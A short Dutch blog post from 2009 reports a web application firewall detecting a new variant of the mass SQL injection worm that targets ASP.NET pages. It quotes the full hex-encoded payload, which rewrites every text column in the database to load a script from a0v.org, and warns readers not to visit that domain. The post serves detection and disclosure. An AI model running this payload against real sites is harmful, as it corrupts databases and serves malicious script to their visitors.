Onze web application firewall infrastructuur heeft een nieuwe variant gedetecteerd van de SQL Injection worm, die nu ook ASP.NET pagina's via Google aanvalt.
de payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0
dit is ASCII HEX encoding. Burp Suite heeft hier geen problemen mee :)
Het enige verschil met de SQL injection worm van 2008 is de script payload met een link naar a0v.org/x.js (niet bezoeken!)
Wednesday, July 29, 2009
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment